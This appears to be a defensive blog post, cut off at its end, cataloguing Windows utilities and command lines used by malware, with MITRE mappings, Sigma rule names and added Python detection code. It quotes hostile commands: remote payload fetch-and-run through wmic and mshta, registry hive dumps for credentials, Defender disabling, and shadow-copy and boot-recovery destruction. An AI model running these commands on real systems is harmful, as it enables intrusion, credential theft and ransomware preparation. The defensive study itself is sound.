Common Tools & Techniques Used By Threat Actors and Malware — Part I
If you’ve been keeping up with the information security world even for a little bit, you’ve certainly heard of the recent supply chain attack on the SolarWinds Orion product: a truly sophisticated attack that showed what a determined group with a lot of patience and skill can do.
A lot of research has been done on the techniques and tactics used by the “SUNBURST” backdoor, and a lot of blog posts have been published describing it in extreme detail.
But one recent blog post by CrowdStrike, dubbed “SUNSPOT: An Implant in the Build Process”, details how the threat actors were able to inject the “SUNBURST” backdoor into the source code of the SolarWinds Orion IT management product.
While the blog in itself is a fascinating read that you must definitely check out, one thing that “surprised” me was the usage of two techniques.
The first one is persistence using the scheduled tasks utility, and the second is the log file dropped to disk (C:\Windows\Temp\) in typical malware fashion.
This got me thinking that if even the most sophisticated of attackers still use such techniques and utilities, then there is always hope to catch them.
So in this blog post I thought I’d write about the most common techniques, utilities and command line arguments used by malware and threat actors in recent years.
For this I went back and read about 60 recent blog posts and write-ups from “fireeye”, “thedfirreport”, “crowdstrike”, “redcanary” and “checkpoint”, to name a few, and searched for the most recently uploaded malware on sites such as “any.run”, “hybrid-analysis”, “inquest” and “tria.ge”.
Note: This first part of the two-part series will focus mostly on the tools and their command line arguments. Techniques such as process injection, process hollowing, named pipes, etc. will be discussed in the second part.
Windows Utilities (LoLBins)
This will come as a shock to absolutely no one: Windows utilities are among the most widely used tools by malware and threat actors, from discovery and lateral movement to persistence. Below is the list of the most common ones in recent years, in no particular order.
Nltest (nltest.exe)
Network Location Test — List domain controllers(DCs), Force a remote shutdown, Query the status of trust, test trust relationships and the state of domain controller replication. — ss64
As described above, this tool is often used by threat actors to enumerate Active Directory trusts with “domain_trusts” and the domain controllers with “dclist”.
The most common arguments are the following:
- /DOMAIN_TRUSTS — Query domain trusts on <ServerName>
- /DCLIST:<DomainName> — Get the list of DCs for <DomainName>
nltest /domain_trusts
nltest /domain_trusts /all_trusts
nltest /dclist:"[DOMAIN]"
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1482 — Domain Trust Discovery
- T1018 — Remote System Discovery
- T1016 — System Network Configuration Discovery
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_trust_discovery.yml
Schtasks (schtasks.exe)
Enables an administrator to create, delete, query, change, run, and end scheduled tasks on a local or remote computer — MSDN
Used by malware and threat actors as a means of persistence on a system. Below are the most common arguments and their meanings.
- /create : Creates a scheduled task.
- /tn (task name) : A value that specifies a name which uniquely identifies the scheduled task.
- /sc (schedule) : A value that specifies the schedule frequency. Valid values are: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONLOGON, ONIDLE, and ONEVENT.
- /mo (modifier) : A value that refines the schedule type to allow for finer control over the schedule recurrence; the valid values depend on the schedule type.
- /tr (taskrun) : A value that specifies the path and file name of the task to be run at the scheduled time.
- /ru (runasuser) : A value that specifies the user context under which the task runs.
- /run : Used to immediately run a scheduled task.
- /f (force) : A value that forcefully creates the task and suppresses warnings if the specified task already exists.
- /rl (level) : A value that sets the run level for the task. Valid values are LIMITED and HIGHEST. The default is LIMITED.
- /st (starttime) : A value that specifies the start time to run the task. The time format is HH:mm (24-hour time).
- /XML (xmlfile) : A value that creates a task from an XML file
- /delete : Deletes a scheduled task.
- /S : A value that specifies the remote computer to connect to. If omitted, the system parameter defaults to the local computer.
- /end: Stop a running scheduled task.
Here are a couple of examples of how malware / threat actors executed this utility.
SCHTASKS /create /tn [TASK NAME] /sc HOURLY /mo 1 /tr "cmd /c sc config [Service Name] start=AUTO&net start [Service Name]" /ru "NT AUTHORITY\SYSTEM" & SCHTASKS /run /tn [TASK NAME]
schtasks /create /tn [TASK NAME] /tr "C:\Windows\system32\mshta.exe C:\ProgramData\malicious.hta" /sc onlogon /ru System /f
schtasks.exe /Create /SC MINUTE /TN [TASK NAME] /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\Administrator\redacted.ps1" /MO 30 /F
schtasks /CREATE /SC ONSTART /TN [TASK NAME] /TR "'C:\Users\redacted.exe'" /f
schtasks /CREATE /SC ONCE /ST 17:21:58 /TN [TASK NAME] /TR "'C:\Users\redacted.exe'" /f /RL HIGHEST
schtasks.exe /CREATE /XML C:\Windows\TEMP\redacted.xml /TN [TASK NAME] /F
SCHTASKS /Delete /TN * /F
schtasks /tn [TASK NAME] /end
schtasks /create /tn [TASK NAME] /tr "c:\windows\temp\redacted.bat" /sc ONCE /st 00:00 /F /RU System /S [Remote Host]
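Reading command lines like the ones above by eye does not scale, and the flags show up in any case and any order. As an added example that is not part of the original post, here is a small Python parser that turns a schtasks command line (including the "&"-chained form) into a flag map and then scores it on the traits the argument list above hints at: who the task runs as, what the action points at, how aggressive the schedule is, and whether every task is being wiped. The sample command lines, task names and paths are constructed for this example and modeled on the ones quoted above.

```python
import re
from typing import Dict, List, Tuple, Union

# schtasks flags that take a value (from the argument list in this post, plus a few other
# documented ones so that parsing does not go off the rails when they appear).
VALUE_FLAGS = {"tn", "tr", "sc", "mo", "ru", "rp", "rl", "st", "sd", "ed", "du", "xml", "s", "u", "p"}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
# Things in the task action (/tr) that administrators rarely schedule but malware routinely does.
INTERPRETER_RE = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript|cmd|rundll32|regsvr32)(\.exe)?\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\(temp|programdata|users|appdata)\\", re.I)
PS_EVASION_RE = re.compile(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy)?\s+bypass|enc(odedcommand)?\b)", re.I)
SYSTEM_PRINCIPALS = {"system", "nt authority\\system", "s-1-5-18"}

Args = Dict[str, Union[str, bool]]


def split_chain(cmdline: str) -> List[str]:
    """Split 'cmd1 & cmd2' on '&' characters that sit outside double quotes."""
    parts, buf, in_quote = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def tokenize(segment: str) -> List[str]:
    """Split on whitespace but keep double-quoted values whole, then drop the quotes."""
    return [t.strip('"').strip("'") for t in TOKEN_RE.findall(segment)]


def parse_schtasks(segment: str) -> Args:
    """Map one schtasks invocation to {flag: value} (flags lower-cased; bare flags map to True)."""
    tokens = tokenize(segment)
    args: Args = {}
    i = 1 if tokens and re.fullmatch(r"(?i).*schtasks(\.exe)?", tokens[0]) else 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if name in VALUE_FLAGS and i + 1 < len(tokens):
                args[name] = tokens[i + 1]
                i += 2
                continue
            args[name] = True
        i += 1
    return args


def score_task(args: Args) -> List[str]:
    """Reasons this invocation deserves a look; an empty list means nothing notable."""
    reasons: List[str] = []
    tr = str(args.get("tr", ""))
    if "create" in args or "xml" in args:
        if str(args.get("ru", "")).lower() in SYSTEM_PRINCIPALS:
            reasons.append("task runs as SYSTEM")
        if INTERPRETER_RE.search(tr):
            reasons.append("task action is a script or LOLBin interpreter")
        if USER_WRITABLE_RE.search(tr):
            reasons.append("task action lives in a user-writable path")
        if PS_EVASION_RE.search(tr):
            reasons.append("hidden window, execution policy bypass or encoded command")
        if str(args.get("rl", "")).lower() == "highest":
            reasons.append("requests highest run level")
        if str(args.get("sc", "")).lower() in {"minute", "onlogon", "onstart"}:
            reasons.append("aggressive or boot/logon-time schedule")
        if USER_WRITABLE_RE.search(str(args.get("xml", ""))):
            reasons.append("task definition imported from a user-writable path")
    if "delete" in args and str(args.get("tn", "")) == "*":
        reasons.append("deletes every scheduled task")
    return reasons


def analyze(cmdline: str) -> List[Tuple[Args, List[str]]]:
    """Parse and score every schtasks segment of a command line, including '&'-chained ones."""
    results = [(args, score_task(args)) for args in map(parse_schtasks, split_chain(cmdline))]
    created = {str(a.get("tn")) for a, _ in results if "create" in a}
    for a, reasons in results:
        if "run" in a and str(a.get("tn")) in created:
            reasons.append("task created and run immediately in the same command line")
    return results


# Constructed sample command lines modeled on the ones quoted above (task names and paths are made up).
SAMPLES = [
    r'schtasks /create /tn "SysUpdate" /tr "C:\Windows\system32\mshta.exe C:\ProgramData\update.hta" /sc onlogon /ru System /f',
    r'schtasks.exe /Create /SC MINUTE /TN "Backup" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File C:\Users\Administrator\run.ps1" /MO 30 /F',
    r'SCHTASKS /create /tn "SvcFix" /sc HOURLY /mo 1 /tr "cmd /c sc config MySvc start=AUTO&net start MySvc" /ru "NT AUTHORITY\SYSTEM" & SCHTASKS /run /tn "SvcFix"',
    r'SCHTASKS /Delete /TN * /F',
    r'schtasks /create /tn "Inventory" /tr "C:\Program Files\Vendor\agent.exe --scan" /sc daily /st 02:00 /ru "CORP\svc_inventory"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        for args, reasons in analyze(line):
            print(f'{args.get("tn")!s:12} -> {"; ".join(reasons) or "nothing notable"}')
```

The last sample is the kind of vendor agent task an administrator creates; it scores nothing, which is the point: the traits, not the mere presence of schtasks.exe, separate it from the other four. Tune the sets and regexes to what your own baseline shows.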
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_susp_schtask_creation.yml
- win_rare_schtask_creation.yml
- win_powersploit_empire_schtasks.yml
Wmic (wmic.exe)
The WMI command-line (WMIC) utility provides a command-line interface for Windows Management Instrumentation (WMI) — MSDN
Attackers use this utility in a lot of different ways. You can kill processes, search for processes, delete shadow copies, execute processes locally or remotely and so forth (it’s practically limitless). Here are just a couple of examples of how this utility is often used:
wmic /node:"Remote @IP" process call create "Malicious File"
wmic process where "name like '%$process%'" delete
wmic.exe shadowcopy delete
wmic process where ExecutablePath='Path to executable' delete
wmic /NODE:"COMPUTER NAME" /USER:"username" /PASSWORD:"password" process call create "powershell.exe -Command {IEX (New-Object Net.Webclient).DownloadString('http://@IP/redacted.ps1')}"
wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl"
Note that WMI is used quite often by threat actors and malware, and “WMIC” is only half of the story. You can do magical stuff with WMI and PowerShell.
I highly encourage you to read more on this and the recent attacks using WMI.
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1518.001 — Software Discovery: Security Software Discovery
- T1490 — Inhibit System Recovery
- T1047 — Windows Management Instrumentation
- T1220 — XSL Script Processing
- T1078.003 — Valid Accounts: Local Accounts
- T1057 — Process Discovery
SIGMA Rules
Depending on the context of the execution, you can use multiple sigma rules to detect the usage of “wmic”; below are a couple of examples:
- win_susp_wmi_execution.yml
- win_xsl_script_processing.yml
- win_susp_eventlog_clear.yml
Net (net.exe)
The Net.exe Utility component is a command-line tool that controls users, groups, services, and network connections. — MSDN
This utility can be used to view shares, create users and groups, perform discovery, view the password policy, etc. Here are a couple of commands executed by threat actors and malware:
net user
net group "domain admins" /domain
net group "enterprise admins" /domain
net group "Domain Users" /domain
net view
net view /all /domain
net stop [Service] /y
net share
net users
net use
net use q: \\DomainController\DomainName /user:DomainName\administrator [Password]
net config workstation
net localgroup users
net localgroup /domain
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1087.001 Account Discovery: Local Account
- T1087.002 Account Discovery: Domain Account
- T1136.001 Create Account: Local Account
- T1136.002 Create Account: Domain Account
- T1070.005 Indicator Removal on Host: Network Share Connection Removal
- T1135 Network Share Discovery
- T1201 Password Policy Discovery
- T1069.001 Permission Groups Discovery: Local Groups
- T1069.002 Permission Groups Discovery: Domain Groups
- T1021.002 Remote Services: SMB/Windows Admin Shares
- T1018 Remote System Discovery
- T1049 System Network Connections Discovery
- T1007 System Service Discovery
- T1569.002 System Services: Service Execution
- T1124 System Time Discovery
Sc (sc.exe)
Communicates with the Service Controller and installed services — MSDN
Used by attackers to disable, create, delete or stop services. Below are the most common arguments.
- Create : Creates a subkey and entries for a service in the registry and in the Service Control Manager database.
- Config : Modifies the value of a service’s entries in the registry and in the Service Control Manager database.
- Delete : Deletes a service subkey from the registry. If the service is running or if another process has an open handle to the service, the service is marked for deletion.
- Stop : Sends a STOP control request to a service.
sc config [Service] start= Disabled
sc config [Service] binPath= "Malicious Command"
sc delete [Service]
sc start [Service]
sc stop [Service]
sc create [Redacted] binPath= "Path" DisplayName= "Redacted" start= auto
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1543.003 — Create or Modify System Process: Windows Service
- T1569.002 — System Services: Service Execution
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_using_sc_to_change_sevice_image_path_by_non_admin.yml
- win_susp_service_path_modification.yml
- win_service_stop.yml
- win_new_service_creation.yml
- win_multiple_suspicious_cli.yml
BCDEdit (bcdedit.exe)
BCDEdit is a command-line tool for managing Boot Configuration Data stores — MSDN
Often used by ransomware to disable recovery features.
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {current} safeboot minimal
bcdedit /f /delete {bootmgr}
bcdedit /set {globalsettings} advancedoptions false
bcdedit.exe /import "C:\Users\redacted\redacted.txt" /clean
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Mshta (mshta.exe)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files — Wikipedia
Often seen at early stages of infection as a child of an Office executable or WinRAR, etc., but it can also be seen as a mechanism to bypass whitelisting or application control.
mshta.exe [URL] /f
mshta.exe "about:<hta:application><script>[Malicious Content]</script>"
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Rundll32 (rundll32.exe)
As the name suggests, the “rundll32.exe” executable is used to run DLLs (Dynamic Link Libraries). I’ve blogged about it in the past, so go check it out to get a better understanding of how the tool works.
In short, this utility can be used to execute malicious DLLs, hijacked COM servers, JavaScript, or even DLLs loaded remotely from a share. The LOLBAS project has some great examples.
In the wild you’ll often see DLL execution where the DLL in question is a Cobalt Strike payload. It goes something like this:
rundll32 [Malicious DLL], [Exported Function]
rundll32 [Malicious DLL], #[Exported Function by Ordinal]
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
- win_process_dump_rundll32_comsvcs.yml
- win_susp_rundll32_activity.yml
- win_susp_rundll32_by_ordinal.yml
- win_susp_wmic_proc_create_rundll32.yml
Attrib (attrib.exe)
Displays, sets, or removes attributes assigned to files or directories — MSDN
Often used by malware to hide a file or a folder.
attrib +h [File / Folder]
attrib +s +h [File / Folder]
SIGMA Rules
You can detect this tool using the following sigma rules:
Reg (reg.exe)
Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. — MITRE ATT&CK
Used by attackers as a means to persist on a system by adding or modifying keys, as a query mechanism to check whether certain configurations or software are installed, and as a mechanism to dump credentials.
Here are the most common parameters of this utility used by attackers:
- ADD : Adds a new subkey or entry to the registry.
- SAVE : Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
- QUERY : Returns a list of the next tier of subkeys and entries that are located under a specified subkey in the registry.
- DELETE : Deletes a subkey or entries from the registry.
Since the usage of this utility is simple (you can look it up in MSDN), what’s interesting to look at from a command line perspective are the registry keys that the attackers or malware are trying to modify, dump or write to. For that I’ll simply say google it and you’ll find an article about it. Below are some of the most common ones.
reg.exe save hklm\security [PATH]
reg save hklm\system [PATH]
reg save hklm\sam [PATH]
reg ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "[NAME]" /t REG_SZ /F /D "[COMMAND]"
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "3" /f
reg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\Data [Path] /y
reg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\GBG [Path] /y
reg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\Skew1 [Path] /y
reg save HKLM\SYSTEM\CurrentControlSet\Control\LSA\JD [Path] /y
The list could be a blog post on its own. I encourage you to take a look at the resources I’ll link at the end of this blog to see more registry keys in action.
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1112 — Modify Registry
- T1012 — Query Registry
- T1552.002 — Unsecured Credentials: Credentials in Registry
SIGMA Rules
You can detect this tool using the following sigma rules:
Whoami (whoami.exe)
Displays user, group and privileges information for the user who is currently logged on to the local system — MSDN
Here are the most common flags / parameters that are used in malware or by threat actors:
- /upn : Displays the user name in user principal name (UPN) format.
- /user : Displays the current domain and user name and the security identifier (SID).
- /groups : Displays the user groups to which the current user belongs.
- /priv : Displays the security privileges of the current user.
- /all : Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to.
whoami
whoami /all
whoami /groups
whoami /priv
whoami /user
whoami /upn
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
- T1033 — System Owner/User Discovery
- T1059.003 — Command and Scripting Interpreter: Windows Command Shell
SIGMA Rules
You can detect this tool using the following sigma rules:
Systeminfo (systeminfo.exe)
Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties (such as RAM, disk space, and network cards) — MSDN
Used by malware and threat actors as a means of discovery. The most common form you’ll find in a log is simply “systeminfo.exe”, but it can also be executed remotely with the “/s” flag.
systeminfo.exe
systeminfo /s [Remote Computer]
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Arp (arp.exe) & Ping (ping.exe)
ARP : Displays and modifies entries in the Address Resolution Protocol (ARP) cache — MSDN
The ARP command is most often used with the “-a” argument to display the ARP table on a system.
PING : Verifies IP-level connectivity to another TCP/IP computer by sending Internet Control Message Protocol (ICMP) echo Request messages — MSDN
The ping command is often used as a discovery mechanism to see if machines are up, or as a delay mechanism before executing a command.
Below are examples of both of these utilities being executed by malware or threat actors:
arp -a
ping -n [Number Of Pings] -4 @IP
ping localhost -n 5 && del [Path to executable]
ping [DOMAIN CONTROLLER]
ping @IP -n 1 -w 5000
ping 0x7f000001 -n 5 -w 10000
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Taskkill (taskkill.exe)
Ends one or more tasks or processes. Processes can be ended by process ID or image name — MSDN
As the name suggests, this utility is used to terminate running processes. Often used by malware or threat actors to make sure that other processes such as backup software or AV software don’t interfere with their work.
The two most common command line arguments are:
- /im : Specifies the image name of the process to be terminated. Use the wildcard character (*) to specify all image names.
- /f : Specifies that processes be forcefully ended. This parameter is ignored for remote processes; all remote processes are forcefully ended.
So the command line often executed by malware is the following:
taskkill /im [Executable] /f
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
ICacls (icacls.exe)
Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories. — MSDN
Often used by malware and ransomware to change directory and file permissions.
Either by granting full permissions on files and folders in the case of ransomware, which is generally one of the last steps before launching the encryption operation, or by removing all access to a folder or file in order to protect a persistence mechanism.
Below are the most common arguments and their meanings:
- /T : Traverse all subfolders to match files/directories.
- /C : Continue on file errors.
- /L : Perform the operation on a symbolic link itself, not its target.
- /Q : Quiet; suppresses success messages.
- /grant user:permission : Grant the specified user access rights.
- /deny user:permission : Explicitly deny the specified user access rights.
- “:F” (Full Access) / “:R” (Read-Only)
Here are a couple of examples of how malware uses this in action:
icacls [Disk Partition]:\* /grant Everyone:F /T /C /Q
icacls [Path To File/Folder] /deny *S-1-1-0:R
icacls [Path to Folder/File] /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
icacls [Path To File/Folder] /deny *S-1-1-0:(OI)(CI)(DE,DC)
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Vssadmin (vssadmin.exe)
Displays current volume shadow copy backups and all installed shadow copy writers and providers — MSDN
This utility is often used by ransomware to delete volume shadow copies from a computer to prevent any restoration. The most common command line arguments are the following:
vssadmin delete shadows
vssadmin delete shadows /all
vssadmin delete shadows /all /quiet
vssadmin resize shadowstorage
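The sc, bcdedit, reg, wmic and vssadmin sections above all boil down to a handful of command line shapes, and they tend to fire together on the same host minutes before encryption starts. As an added example that is not part of the original post, here is a small Python rule table in the spirit of the sigma rules referenced throughout, run over constructed process-creation events (Sysmon-style Image / CommandLine fields). Command lines are normalized before matching so case and whitespace games do not help, and a second pass looks for hosts where more than one T1490 (Inhibit System Recovery) rule fired. The rule names, the event samples and the host names are my own constructions; the technique ids are the ones quoted in the sections above.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Rule(NamedTuple):
    name: str
    image: str      # regex matched against the process image file name
    cmdline: str    # regex matched against the normalized (lower-case, single-spaced) command line
    technique: str  # MITRE ATT&CK id quoted in this post


# Rules derived from the command lines quoted in the sc, bcdedit, reg, wmic and vssadmin sections.
RULES = [
    Rule("vssadmin_delete_shadows", r"^vssadmin(\.exe)?$", r"\bdelete shadows\b", "T1490"),
    Rule("vssadmin_resize_shadowstorage", r"^vssadmin(\.exe)?$", r"\bresize shadowstorage\b", "T1490"),
    Rule("wmic_shadowcopy_delete", r"^wmic(\.exe)?$", r"\bshadowcopy delete\b", "T1490"),
    Rule("bcdedit_disable_recovery", r"^bcdedit(\.exe)?$",
         r"recoveryenabled no|bootstatuspolicy ignoreallfailures", "T1490"),
    Rule("bcdedit_safeboot", r"^bcdedit(\.exe)?$", r"\bsafeboot minimal\b", "T1490"),
    Rule("wmic_remote_process_create", r"^wmic(\.exe)?$", r"/node:.*\bprocess call create\b", "T1047"),
    Rule("wmic_remote_xsl", r"^wmic(\.exe)?$", r'/format:\s*"?(https?://|\\\\)', "T1220"),
    Rule("sc_binpath_or_start_change", r"^sc(\.exe)?$", r"\bconfig\b.*\b(binpath=|start=\s*disabled)", "T1543.003"),
    Rule("reg_disable_defender", r"^reg(\.exe)?$",
         r'windows defender.*disableantispyware|services\\windefend.*\bstart\b.*/d\s*"?[34]\b', "T1112"),
    Rule("reg_hive_dump", r"^reg(\.exe)?$", r"\bsave hklm\\(sam|security|system)\b", "T1552.002"),
]


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace so case and padding do not dodge the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def match_rules(event: Dict[str, str], rules: List[Rule] = RULES) -> List[Rule]:
    """Every rule whose image pattern and command line pattern both match the event."""
    image = event["Image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmd = normalize(event["CommandLine"])
    return [r for r in rules if re.search(r.image, image) and re.search(r.cmdline, cmd)]


def scan(events: List[Dict[str, str]]):
    """(computer, rule name, technique) for every hit across a batch of events."""
    return [(ev["Computer"], r.name, r.technique) for ev in events for r in match_rules(ev)]


def recovery_inhibit_hosts(hits, threshold: int = 2) -> List[str]:
    """Hosts where at least `threshold` distinct T1490 rules fired: the pre-encryption pattern."""
    per_host = defaultdict(set)
    for computer, name, technique in hits:
        if technique == "T1490":
            per_host[computer].add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= threshold)


S32 = r"C:\Windows\System32"
# Constructed sample events; host names, paths and the XSL URL are made up for this example.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": S32 + r"\vssadmin.exe", "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Computer": "WS01", "Image": S32 + r"\wbem\WMIC.exe", "CommandLine": "wmic.exe shadowcopy delete"},
    {"Computer": "WS01", "Image": S32 + r"\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"Computer": "WS02", "Image": S32 + r"\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:"10.0.0.5" /user:"corp\admin" process call create "powershell.exe -enc AAAA"'},
    {"Computer": "WS02", "Image": S32 + r"\reg.exe",
     "CommandLine": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'},
    {"Computer": "WS02", "Image": S32 + r"\reg.exe", "CommandLine": r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"Computer": "WS02", "Image": S32 + r"\sc.exe", "CommandLine": "sc config BackupSvc start= disabled"},
    {"Computer": "WS02", "Image": S32 + r"\wbem\WMIC.exe", "CommandLine": 'wmic os get /format:"https://example.test/evil.xsl"'},
    {"Computer": "WS03", "Image": S32 + r"\vssadmin.exe", "CommandLine": "vssadmin list shadows"},  # benign: listing only
    {"Computer": "WS03", "Image": S32 + r"\sc.exe", "CommandLine": "sc query BackupSvc"},            # benign: query only
]

if __name__ == "__main__":
    for computer, name, technique in scan(SAMPLE_EVENTS):
        print(f"{computer}: {name} ({technique})")
    print("hosts with multiple recovery-inhibiting commands:", recovery_inhibit_hosts(scan(SAMPLE_EVENTS)))
```

WS03 produces nothing even though the same binaries ran there, which is what you want from rules keyed on arguments rather than on image names; WS01 is the host to pull off the network first.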
Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool
SIGMA Rules
You can detect this tool using the following sigma rules:
Open Source / Third Party Tools
Other than Windows binaries, attackers use some open source / third party tools to perform their attacks. Below are some of the tools that are used by attackers.
Note: This is by no means an extensive list, these are the most common tools I’ve found while reading these blog posts and looking at sandbox reports.
You’ll notice that I've omitted utilities like PowerShell, WScript, Regsvr32, Dllhost, etc. These are still highly prevalent and used in attacks. I hope that you, the reader, will be intrigued enough to look up some of the resources I’ll link below and do more research.
Detection / Threat Hunting Opportunities
Now that we’re familiar with some of the utilities used by malware and threat actors, you’ll want to start writing rules or using open source ones to detect them. Whether you’re engineering a detection or hunting for a threat, here are the things that you should look for and keep in mind.
Baseline your environment
Before you start writing rules and triggering alerts, you need to remember that most of the rules out there are not designed to be specific to an environment; rather, they are specific to a threat or a technique. This means that when you’re writing or implementing a rule, don’t take it at face value. Always adapt it to your environment by baselining the behavior of the users in it. We all have that one administrator with the “greatest” of ideas.
Registry Keys Modification / Creation
Most malware and threat actors, if not all, interact with the registry in some form or another, for multiple reasons.
A good idea is to always keep an eye on registry key interaction by creating rules that monitor specific keys with different threat scores.
Even if you can’t afford to do research on the different registry keys, the internet is full of blog posts and research describing what current malware and threat actors are using.
Execution In Succession
Most of the tools mentioned in this blog are used on a daily basis in some environments by administrators and scripts. If you write a rule that triggers each time one is used, you’re in for a hell of a night of false positives.
In the case of utilities like these, always consider the time frame between executions. Take the example below:
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
Running “whoami”, “hostname”, “ipconfig /all”, “net user /domain”, etc. in a row is very unlikely.
Command Line Arguments
The whole point of this blog post was to familiarize the non-initiated (including myself) with the utilities that are being used by malware in recent years and their command line arguments. So if you take anything from this:
ALWAYS INVESTIGATE THE COMMAND LINE OF A PROCESS
Uncommon Child / Parent Relationship
The first thing that a threat actor or a piece of malware needs to do before executing is reach its target, and for that an entry point is required.
Whether it’s an email attachment or what have you, the malware needs to trick the user (except in the case of a vulnerability that doesn’t need user interaction) into executing something.
So at some point in time we’ll have a “legitimate” process like “word.exe” spawning another process that’ll execute the malicious code, like “powershell.exe”. This notion of “legitimate” child processes requires some knowledge of the OS that you’re hunting against, and it’s required to catch evil.
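The two hunting ideas above (discovery commands executed in succession, and an uncommon parent spawning a script host) both fall out of the same process-creation telemetry, so here is one added Python example, not part of the original post, that implements both over a constructed batch of Sysmon-style events. The succession check groups events per host and user, slides a time window over them and reports the window holding the most distinct discovery tools; the parent/child check flags document or archiver parents launching script interpreters. The tool sets, the host names and user names, and the event records are assumptions made up for this example; the discovery chain on WS02 mirrors the one quoted above.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Binaries this post treats as discovery tools, and parent/child pairings that rarely happen
# legitimately. Both sets are assumptions for this example, not exhaustive lists.
DISCOVERY_BINARIES = {"whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe", "net1.exe", "netstat.exe",
                      "tasklist.exe", "sc.exe", "systeminfo.exe", "reg.exe", "nltest.exe", "arp.exe", "ping.exe"}
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "winrar.exe", "7zfm.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                   "rundll32.exe", "regsvr32.exe", "schtasks.exe"}

Event = Dict[str, str]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_ts(value: str) -> datetime:
    # Constructed events use "YYYY-MM-DD HH:MM:SS"; real Sysmon UtcTime also carries milliseconds.
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def discovery_bursts(events: List[Event], window_seconds: int = 300,
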